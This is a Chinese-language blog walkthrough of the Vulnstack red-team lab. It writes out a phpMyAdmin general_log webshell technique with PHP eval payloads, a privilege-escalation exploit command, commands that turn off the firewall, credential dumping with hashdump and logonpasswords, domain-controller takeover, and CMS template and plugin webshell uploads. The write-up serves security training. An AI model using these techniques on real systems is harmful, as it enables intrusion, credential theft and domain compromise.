[渗透测试]ATT&CK实战 | Vulnstack 红队

Posted 2022-01-01 Y4tacker

文章目录

• • 写在前面
  • 拿下webshell
  • 简单信息搜集
  • CS上线
  • 继续信息搜集
  • 提权
  • 攻击域-接管整个域
  • 完结撒花
  • 题外操作
  • • 其他拿webshell姿势
    • • 修改模板拿shell
      • 插件上传拿shell

@Author：Y4tacker

写在前面

无聊，再玩一个靶场，顺便记录下，也学了一些新东西，当然我觉得我的整个过程还是很有逻辑性的

拿下webshell

打开网站以后发现是个php探针，没啥意义，除了试一试弱口令

同时使用dirsearch扫描

发现有phpmyadmin，尝试为弱口令root\\root

查询SHOW VARIABLES LIKE "%SECURE%"

发现配置未开启，那么不能使用into outfile写马进去

SHOW VARIABLES LIKE "%general%"发现·general_log·未开启了，那么开启了改日志路径写马即可

执行set global general_log_file="C:/phpStudy/WWW/1.php"

执行SET GLOBAL general_log='on'

接下来执行SELECT '<?php eval($_POST[1]);?>

连接成功，执行命令

但是现在有个很尴尬的问题，就是有其他字符不能用蚁剑连接，那制作一个干净的shell

那么执行1=file_put_contents("y4tacker.php",base64_decode("PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B"));

简单信息搜集

接下来去蚁剑终端执行命令收集下信息

C:\\phpStudy\\WWW> whoami
god\\administrator

执行ipconfig，发现两个网卡，一个内网一个外网

查看当前登录域及登录用户信息

C:\\phpStudy\\WWW> net config Workstation
计算机名                     \\\\STU1
计算机全名                   stu1.god.org
用户名                       Administrator
工作站正运行于               
    NetBT_Tcpip_4DAEBDFD-0177-4691-8243-B73297E2F0FF (000C29E78EDC)
    NetBT_Tcpip_55ECD929-FBB2-4D96-B43D-8FFEB14A169F (000C29E78EE6)
    NetBT_Tcpip_EC57C4EB-763E-4000-9CDE-4D7FF15DF74C (02004C4F4F50)
软件版本                     Windows 7 Professional
工作站域                     GOD
工作站域 DNS 名称            god.org
登录域                       GOD

发现有三台工作主机

工作站域为god，域DNS名称god.org

看看域控

C:\\phpStudy\\WWW> net group "domain controllers" /domain
这项请求将在域 god.org 的域控制器处理。
组名     Domain Controllers
注释     域中所有域控制器
成员
-------------------------------------------------------------------------------
OWA$                     

以及查看域管

C:\\phpStudy\\WWW> net group "domain admins" /domain
这项请求将在域 god.org 的域控制器处理。
组名     Domain Admins
注释     指定的域管理员
成员
-------------------------------------------------------------------------------
Administrator            OWA$       

查看域成员，没结果那么等下cs上线好了，这个终端不太好用

C:\\phpStudy\\WWW> net view /domain:god

结果是

CS上线

创建一个监听器

搞一个马，准备上线了

利用蚁剑上传执行

上线成功

继续信息搜集

查看主机名

shell hostname

查看用户列表

shell net users

shell net localgroup administrators

得到
Administrator
liukaifeng01
命令成功完成。

提权

接下来提权吧

通过执行systeminfo

修补程序:         安装了 4 个修补程序。                  [01]: KB2534111                  [02]: KB2999226                  [03]: KB958488                  [04]: KB976902

尝试

shell CVE-2019-0803.exe cmd "start web.exe"

成功

接下里看看

shell tasklist

并没有开启啥防护软件

查看防火墙状态，执行发现开启了不截图了

shell netsh firewall show state

关闭防火墙

shell netsh advfirewall set allprofiles state off

攻击域-接管整个域

查看当前域内计算机列表

net view

看到成功列出

查看域控列表

net dclist

抓取凭证

hashdump

获得明文

logonpasswords

部分截图

创建smb监听器

拿下了OWA域控

同理，不过这次session换成刚拿下的OWA

完结撒花

整个域沦陷

题外操作

其他拿webshell姿势

额，我们也进去看到了目录，不仅仅有phpmyadmin，可以看到这里还有一个之前扫描仪没扫到的yxcms

beifen.rar真有你的

访问看到后台地址与密码

后台访问http://xxx/yxcms/?r=admin

修改模板拿shell

看到修改模板的闭着眼睛都知道怎么搞

测试下没毛病

插件上传拿shell

首先经过我的简单测试是有一些小校验的，小问题，导出他自己的插件并点击卸载

简简单单测试个phpinfo();

修改上传，拿下，太简单了没啥意义的东西

然后呢看看源码也是很简单的，包括zip目录校验啥的不解读了，没过率